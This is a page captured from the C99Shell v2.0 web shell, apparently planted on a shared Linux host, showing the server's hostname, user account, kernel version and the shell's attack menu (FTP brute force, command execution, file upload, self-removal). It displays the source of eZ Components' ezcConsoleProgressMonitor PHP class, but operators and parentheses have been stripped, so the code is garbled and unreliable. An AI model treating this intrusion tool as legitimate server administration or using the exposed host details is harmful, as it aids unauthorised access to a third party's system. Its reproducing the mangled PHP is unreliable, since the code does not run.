!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/opt/alt/php54/usr/share/pear/ezc/ConsoleTools/   drwxr-xr-x
Free 294.04 GB of 429.69 GB (68.43%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     progressmonitor.php (5.83 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * File containing the ezcConsoleProgressMonitor class.
 *
 * @package ConsoleTools
 * @version 1.6.1
 * @copyright Copyright (C) 2005-2010 eZ Systems AS. All rights reserved.
 * @license http://ez.no/licenses/new_bsd New BSD License
 * @filesource
 */

/**
 * Printing structured status information on the console. 
 *
 * <code>
 * // Construction
 * $status = new ezcConsoleProgressMonitor( new ezcConsoleOutput(), 42 );
 *
 * // Run statusbar
 * foreach ( $files as $file )
 * {
 *      $res = $file->upload();
 *      // Add a status-entry to be printed.
 *      $status->addEntry( 'UPLOAD', $file->path );
 *      // Result like "    2.5% UPLOAD /var/upload/test.png"
 * }
 * </code>
 *  
 * @property ezcConsoleProgressMonitorOptions $options
 *           Contains the options for this class.
 * 
 * @package ConsoleTools
 * @version 1.6.1
 * @mainclass
 */
class ezcConsoleProgressMonitor
{
    
/**
     * Options
     *
     * @var ezcConsoleProgressMonitorOptions
     */
    
protected $options;

    
/**
     * The ezcConsoleOutput object to use.
     *
     * @var ezcConsoleOutput
     */
    
protected $outputHandler;

    
/**
     * Counter for the items already printed. 
     * 
     * @var int
     */
    
protected $counter 0;

    
/**
     * The number of entries to expect. 
     * 
     * @var int
     */
    
protected $max;

    
/**
     * Creates a new progress monitor.
     * The $outputHandler parameter will be used to display the progress
     * monitor. $max is the number of monitor items to expect. $options can be
     * used to define the behaviour of the monitor
     * {@link ezcConsoleProgressMonitorOptions}.
     *
     * @param ezcConsoleOutput $outHandler   Handler to utilize for output
     * @param int $max                       Number of items to expect
     * @param array(string=>string) $options Options.
     *
     * @see ezcConsoleProgressMonitor::$options
     */
    
public function __constructezcConsoleOutput $outHandler$max, array $options = array() )
    {
        
$this->outputHandler $outHandler;
        
$this->max $max;
        
$this->options = new ezcConsoleProgressMonitorOptions$options );
    }

    
/**
     * Property read access.
     * 
     * @param string $key Name of the property.
     * @return mixed Value of the property or null.
     *
     * @throws ezcBasePropertyNotFoundException
     *         If the the desired property is not found.
     */
    
public function __get$key )
    {
        switch ( 
$key )
        {
            case 
'options':
                return 
$this->options;
                break;
        }
        throw new 
ezcBasePropertyNotFoundException$key );
    }
    
    
/**
     * Property write access.
     * 
     * @param string $propertyName Name of the property.
     * @param mixed $val  The value for the property.
     *
     * @throws ezcBaseValueException 
     *         If a the value for the property options is not an instance of 
     *         ezcConsoleProgressMonitorOptions. 
     * @return void
     */
    
public function __set$propertyName$val )
    {
        switch ( 
$propertyName 
        {
            case 
'options':
                if ( !( 
$val instanceof ezcConsoleProgressMonitorOptions ) )
                {
                    throw new 
ezcBaseValueException$propertyName$val'instance of ezcConsoleProgressMonitorOptions' );
                }
                
$this->options $val;
                return;
        }
        throw new 
ezcBasePropertyNotFoundException$propertyName );
    }
    
    
    
/**
     * Property isset access.
     * 
     * @param string $propertyName Name of the property.
     * @return bool True is the property is set, otherwise false.
     */
    
public function __isset$propertyName )
    {
        switch ( 
$propertyName )
        {
            case 
'options':
                return 
true;
        }
        return 
false;
    }

    
/**
     * Set new options.
     * This method allows you to change the options of an progress monitor.
     *  
     * @param ezcConsoleProgressMonitorOptions $options The options to set.
     *
     * @throws ezcBaseSettingNotFoundException
     *         If you tried to set a non-existent option value. 
     * @throws ezcBaseSettingValueException
     *         If the value is not valid for the desired option.
     * @throws ezcBaseValueException
     *         If you submit neither an array nor an instance of 
     *         ezcConsoleProgressMonitorOptions.
     */
    
public function setOptions$options 
    {
        if ( 
is_array$options ) ) 
        {
            
$this->options->merge$options );
        } 
        else if ( 
$options instanceof ezcConsoleProgressMonitorOptions 
        {
            
$this->options $options;
        }
        else
        {
            throw new 
ezcBaseValueException"options"$options"instance of ezcConsoleProgressMonitorOptions" );
        }
    }

    
/**
     * Returns the currently set options.
     * Returns the currently set option array.
     * 
     * @return ezcConsoleProgressMonitorOptions The options.
     */
    
public function getOptions()
    {
        return 
$this->options;
    }
 
    
/**
     * Print a status entry.
     * Prints a new status entry to the console and updates the internal counter.
     *
     * @param string $tag  The tag to print (second argument in the 
     *                     formatString).
     * @param string $data The data to be printed in the status entry (third 
     *                     argument in the format string).
     * @return void
     */
    
public function addEntry$tag$data )
    {
        
$this->counter++;
        
$percentage $this->counter $this->max 100;

        
$this->outputHandler->outputLine(
            
sprintf(
                
$this->options['formatString'],
                
$percentage,
                
$tag,
                
$data
            
)
        );
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0041 ]--